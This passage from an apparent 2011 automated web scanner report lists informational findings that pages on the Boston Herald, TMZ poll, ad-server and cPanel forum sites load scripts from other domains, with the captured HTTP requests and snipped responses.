<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <!-- // section_beta.tmpl // --
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...
</script>
<SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT>
...[SNIP]...

18.30. http://bostonherald.com/track/inside_track/view.bg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /track/inside_track/view.bg

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /track/inside_track/view.bg?articleid=1366225&srvc=track&position=2 HTTP/1.1
Host: bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/track/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bhfont=12; OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; bhpopup=on; RMFD=011R4jGHO201yed8|O2021J3t|O3021J78|O2021J7A|O2021J7F|O10226KY|O20226Kk; __utma=235728274.611537932.1316021623.1316021623.1316239291.2; __utmb=235728274.32.10.1316239294; __utmc=235728274; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1358113657.1316021626.1316021626.1316239316.2; __utmb=1.10.10.1316239316; __utmc=1; __utmz=1.1316239316.2.2.utmcsr=bostonherald.com|utmccn=(referral)|utmcmd=referral|utmcct=/news/

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:46:19 GMT
Server: Apache
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 54573

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="http://ogp.me/ns#" xmln
...[SNIP]...
</script> -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

   <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->


<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.31. http://bostonherald.com/track/inside_track/view/20110907sox_with_heels/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /track/inside_track/view/20110907sox_with_heels/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /track/inside_track/view/20110907sox_with_heels/ HTTP/1.1
Host: bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/track/inside_track/view.bg?articleid=1366225&srvc=track&position=2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bhfont=12; OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; bhpopup=on; RMFD=011R4jGHO201yed8|O2021J3t|O3021J78|O2021J7A|O2021J7F|O10226KY|O20226Kk; __utma=235728274.611537932.1316021623.1316021623.1316239291.2; __utmb=235728274.35.10.1316239294; __utmc=235728274; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1358113657.1316021626.1316021626.1316239316.2; __utmb=1.11.10.1316239316; __utmc=1; __utmz=1.1316239316.2.2.utmcsr=bostonherald.com|utmccn=(referral)|utmcmd=referral|utmcct=/news/; tmq=kvqD%3DT

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:48:20 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 48996

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="http://ogp.me/ns#" xmln
...[SNIP]...
</script> -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

   <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->


<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.32. http://bostonherald.com/track/star_tracks/view/20110915cameron_and_tyler_winklevoss_to_star_in_tv_ad/srvc=track&position=also  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /track/star_tracks/view/20110915cameron_and_tyler_winklevoss_to_star_in_tv_ad/srvc=track&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /track/star_tracks/view/20110915cameron_and_tyler_winklevoss_to_star_in_tv_ad/srvc=track&position=also HTTP/1.1
Host: bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/track/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bhfont=12; OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; bhpopup=on; __utma=235728274.611537932.1316021623.1316021623.1316239291.2; __utmb=235728274.12.10.1316239294; __utmc=235728274; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RMFD=011R4jGHO201yed8|O1021J3t|O2021J78|O2021J7A|O2021J7F|O10226KY|O20226Kk; __utma=1.1358113657.1316021626.1316021626.1316239316.2; __utmb=1.3.10.1316239316; __utmc=1; __utmz=1.1316239316.2.2.utmcsr=bostonherald.com|utmccn=(referral)|utmcmd=referral|utmcct=/news/

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:22:51 GMT
Server: Apache
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 49152

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="http://ogp.me/ns#" xmln
...[SNIP]...
</script> -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

   <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->


<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.33. http://bostonheraldnie.newspaperdirect.com/epaper/homepage_v2.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bostonheraldnie.newspaperdirect.com
Path:   /epaper/homepage_v2.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /epaper/homepage_v2.aspx?date=17.9.2011&width=1087 HTTP/1.1
Host: bostonheraldnie.newspaperdirect.com
Proxy-Connection: keep-alive
Referer: http://bostonheraldnie.newspaperdirect.com/epaper/HomePageRedir.aspx?date=17.9.2011&width=1087
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AProfile=l/dlCd2JUFoJvDZBu7A3D1ctGjY=; __utma=29240111.1007682055.1316239560.1316239560.1316239560.1; __utmb=29240111.1.10.1316239560; __utmc=29240111; __utmz=29240111.1316239560.1.1.utmcsr=bostonherald.com|utmccn=(referral)|utmcmd=referral|utmcct=/news/national/

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
wc: 3
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 01:41:17 GMT
Content-Length: 74260


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head><meta http-equiv="content-type" content="text/html;charset=UTF-8"><script type="text/javascript">
window.NDScriptsVers
...[SNIP]...
ref="http://cache2-styles.pressdisplay.com/res/en-us/g423/t53560269/WebResource.ashx?style=style_ver3.css$style-gen2.css$se_bostonheraldnie.css&v=52535864&caching=1" type="text/css" rel="stylesheet">
<script src="http://cache2-scripts.pressdisplay.com/res/WebResource.ashx?script=core&v=1403&caching=1" charset="utf-8" type="text/javascript"></script>
<script src="http://cache2-scripts.pressdisplay.com/res/WebResource.ashx?script=home3&v=1403&caching=1" charset="utf-8" type="text/javascript"></script>
<script src="http://cache2-scripts.pressdisplay.com/res/WebResource.ashx?script=menu.js&v=1403&caching=1" charset="utf-8" type="text/javascript"></script>
<script src="http://cache2-scripts.pressdisplay.com/res/WebResource.ashx?script=ui.js&v=1403&caching=1" charset="utf-8" type="text/javascript"></script>
<script src="http://cache2-scripts.pressdisplay.com/res/WebResource.ashx?script=imggallerymanager.js&v=1403&caching=1" charset="utf-8" type="text/javascript"></script>
...[SNIP]...
</div>


<script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...

18.34. http://bostonheraldnie.newspaperdirect.com/epaper/viewer.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bostonheraldnie.newspaperdirect.com
Path:   /epaper/viewer.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /epaper/viewer.aspx HTTP/1.1
Host: bostonheraldnie.newspaperdirect.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/news/national/?type=rem911
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: psid=283490193; expires=Tue, 17-Sep-2041 01:38:54 GMT; path=/epaper/
wc: 1
Date: Sat, 17 Sep 2011 01:38:54 GMT
Content-Length: 22628


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head><meta http-equiv="content-type" content="text/html;charset=UTF-8"><script type="text/javascript">
window.NDScriptsVers
...[SNIP]...
ref="http://cache2-styles.pressdisplay.com/res/en-us/g423/t53560269/WebResource.ashx?style=style_ver3.css$style-gen2.css$se_bostonheraldnie.css&v=52535864&caching=1" type="text/css" rel="stylesheet">
<script src="http://cache2-scripts.pressdisplay.com/res/WebResource.ashx?script=core&v=1403&caching=1" charset="utf-8" type="text/javascript"></script>
<script src="http://cache2-scripts.pressdisplay.com/res/WebResource.ashx?script=viewer&v=1403&caching=1" charset="utf-8" type="text/javascript"></script>
...[SNIP]...
</div>


<script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...

18.35. http://cdn.optmd.com/V2/80181/197812/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.optmd.com
Path:   /V2/80181/197812/index.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /V2/80181/197812/index.html HTTP/1.1
Host: cdn.optmd.com
Proxy-Connection: keep-alive
Referer: http://3ps.go.com/DynamicAd?srvc=abc&adTypes=Rectangles-Remnant&url=/shows/charlies-angels
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Mon, 21 Jun 2010 20:12:42 GMT
ETag: "800a0-152-4898fed55e280"
Accept-Ranges: bytes
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 338
Date: Sat, 17 Sep 2011 01:02:48 GMT
Connection: close

<html>
<head><meta http-equiv="CACHE-CONTROL" content="NO-CACHE" /><title>Capella University</title></head>
<body style="margin: 0px; padding: 0px;">
<script type="text/javascript" src="http://ad.doubleclick.net/adj/N5956.Casale/B3941858.3;sz=300x250;click0=http://c.casalemedia.com/c/4/1/80181/;ord=121245141?"></script>
...[SNIP]...

18.36. http://cdn.polls.tmz.com/polls/34613/iframe  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.polls.tmz.com
Path:   /polls/34613/iframe

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /polls/34613/iframe?stencil_id=394 HTTP/1.1
Host: cdn.polls.tmz.com
Proxy-Connection: keep-alive
Referer: http://www.toofab.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:50:37 GMT
Server: Apache
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.11
X-Runtime: 0.00165
ETag: "113b4fead1c04532755f9922eb6f7ffc"
Cache-Control: private, max-age=0, must-revalidate, s-maxage=5
Status: 200 OK
Cache-Control: max-age=120
Expires: Sat, 17 Sep 2011 00:52:37 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 4698
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<link href="http://cdn.polls.tmz.com/stencils/394.css" media="screen" rel="stylesheet" type="text/css" />
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js" type="text/javascript"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://tmz.vo.llnwd.net/o28/assets/js/jquery.screwdefaultbuttons.js"></script>
...[SNIP]...

18.37. http://cdn.polls.tmz.com/polls/34614/iframe  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.polls.tmz.com
Path:   /polls/34614/iframe

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /polls/34614/iframe?stencil_id=373 HTTP/1.1
Host: cdn.polls.tmz.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2739F79705012FA3-6000010200347A89[CE]

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:51:59 GMT
Server: Apache
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.11
X-Runtime: 0.00174
ETag: "df15fee33fbc869c5744335d4cae8dee"
Cache-Control: private, max-age=0, must-revalidate, s-maxage=5
Status: 200 OK
Cache-Control: max-age=120
Expires: Sat, 17 Sep 2011 00:53:59 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 4441
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<link href="http://cdn.polls.tmz.com/stencils/373.css" media="screen" rel="stylesheet" type="text/css" />
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js" type="text/javascript"></script>
...[SNIP]...
<form action='http://polls.tmz.com/polls/34614/vote?stencil_id=373' method='post'>
       
<script type="text/javascript" src="http://tmz.vo.llnwd.net/o28/assets/js/jquery.screwdefaultbuttons.js"></script>
...[SNIP]...

18.38. http://cplads.appspot.com/file/104441593408970093297/AIO_300x250_6_27_2011/1309205690/GoogleForm_dp.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cplads.appspot.com
Path:   /file/104441593408970093297/AIO_300x250_6_27_2011/1309205690/GoogleForm_dp.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /file/104441593408970093297/AIO_300x250_6_27_2011/1309205690/GoogleForm_dp.html?click_url=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBAWh0NO9zTsjyLbKGgALEnPHxBsXRq7cC_beIxzTAjbcBkMmHGhABGAEgy5WvEzgAUJGX3-j9_____wFgyQagAcvzheIDsgELd3d3LnRtei5jb226AQozMDB4MjUwX2FzyAEJ2gETaHR0cDovL3d3dy50bXouY29tL-ABArgCGMgCndDbHagDAegD-wPoA7gB9QMACACEoAYR%26num%3D1%26sig%3DAOD64_02j6kYV9LB8nl9oUrafQaSpBkj3Q%26client%3Dca-pub-7832112837345590%26adurl%3D HTTP/1.1
Host: cplads.appspot.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7832112837345590&output=html&h=250&slotname=7188170409&w=300&lmt=1316256809&flash=10.3.183&url=http%3A%2F%2Fwww.tmz.com%2F&dt=1316238807465&bpp=11&shv=r20110907&jsv=r20110914&prev_slotnames=9104404504&correlator=1316238804075&frm=4&adk=4076430307&ga_vid=1637260738.1316238804&ga_sid=1316238804&ga_hid=348414659&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=arial&dfs=14&biw=1071&bih=870&prodhost=googleads.g.doubleclick.net&fu=0&ifi=2&dtd=2082&xpc=qU1fVHR0ss&p=http%3A//www.tmz.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Content-Type: text/html
Date: Sat, 17 Sep 2011 00:52:16 GMT
Server: Google Frontend
Content-Length: 15243

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml"><head>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript">
</script>
...[SNIP]...

18.39. http://d14.zedo.com//ads3/k/951/887163/3853/1000007/i.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d14.zedo.com
Path:   //ads3/k/951/887163/3853/1000007/i.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET //ads3/k/951/887163/3853/1000007/i.js HTTP/1.1
Host: d14.zedo.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=951;c=2;s=2;d=15;w=1;h=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZEDOIDX=13; PI=h484782Za669089Zc826000622,826000622Zs403Zt1255Zm784Zb43199; FFgeo=5386156; FFMChanCap=2457780B305,825#722607,7038#1013066#971199:767,4#789954:951,2#887163|0,1#0,24:0,10#0,24:0,10#0,24:0,1#0,24:0,12#0,24; ZFFAbh=977B826,20|121_977#365; ZFFBbh=987B826,20|121_977#0; FFMCap=2470080B826,110235,110236:933,196008:951,125046|0,1#0,24:0,1#0,24:0,3#0,24:0,3#0,24; FFcat=951,2,15; FFad=0

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=2592000
Content-Type: application/x-javascript
Date: Sat, 17 Sep 2011 01:00:11 GMT
Edge-Control: dca=esi, !no-store
Expires: Wed, 12-Oct-11 09:46:01 GMT
Last-Modified: Mon, 12 Sep 2011 09:46:01 GMT
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Server: ECS (sjo/5278)
Vary: Accept-Encoding
X-Cache: HIT
Content-Length: 1924


var zzDate = new Date();
var zzWindow;
var zzURL;
var isFFgretor3 =false;
if (/Firefox[\/\s](\d+\.\d+)/.test(navigator.userAgent) && (new Number(RegExp.$1)) > 3){
isFFgretor3 = true;}
if (
...[SNIP]...
</span>")
document.write('<SCRIPT SRC="http://ads.cpxinteractive.com/ttj?id=602265" TYPE="text/javascript"><\/script>
...[SNIP]...

18.40. http://forums.cpanel.net/calendar.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.cpanel.net
Path:   /calendar.php

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /calendar.php HTTP/1.1
Host: forums.cpanel.net
Proxy-Connection: keep-alive
Referer: http://forums.cpanel.net/f43/connection-imap-server-failed-96021.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bb_sessionhash=7b42b50b859ac7069bd0783e6f7218a5; bb_lastvisit=1316202173; bb_lastactivity=0; __utma=21786852.1717603496.1316220231.1316220231.1316220231.1; __utmb=21786852.2.10.1316220231; __utmc=21786852; __utmz=21786852.1316220231.1.1.utmcsr=duckduckgo.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmv=21786852.usergroup-1-Unregistered%20%2F%20Not%20Logged%20In

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:50:39 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.17 OpenSSL/0.9.8n DAV/2 PHP/5.3.3 with Suhosin-Patch
X-Powered-By: PHP/5.3.3
Set-Cookie: bb_lastactivity=0; expires=Sat, 15-Sep-2012 19:50:40 GMT; path=/; domain=.cpanel.net
Expires: 0
Cache-Control: private, post-check=0, pre-check=0, max-age=0
Pragma: no-cache
Set-Cookie: vbseo_loggedin=deleted; expires=Thu, 16-Sep-2010 19:50:39 GMT; path=/
Content-Length: 39506
Content-Type: text/html; charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</script><script type="text/javascript" src="//translate.google.com/translate_a/element.js?cb=googleTranslateElementInit"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://connect.facebook.net/en_US/all.js"></script>
...[SNIP]...

18.41. http://forums.cpanel.net/f43/connection-imap-server-failed-96021.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.cpanel.net
Path:   /f43/connection-imap-server-failed-96021.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /f43/connection-imap-server-failed-96021.html HTTP/1.1
Host: forums.cpanel.net
Proxy-Connection: keep-alive
Referer: http://duckduckgo.com/?q=imap+server
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
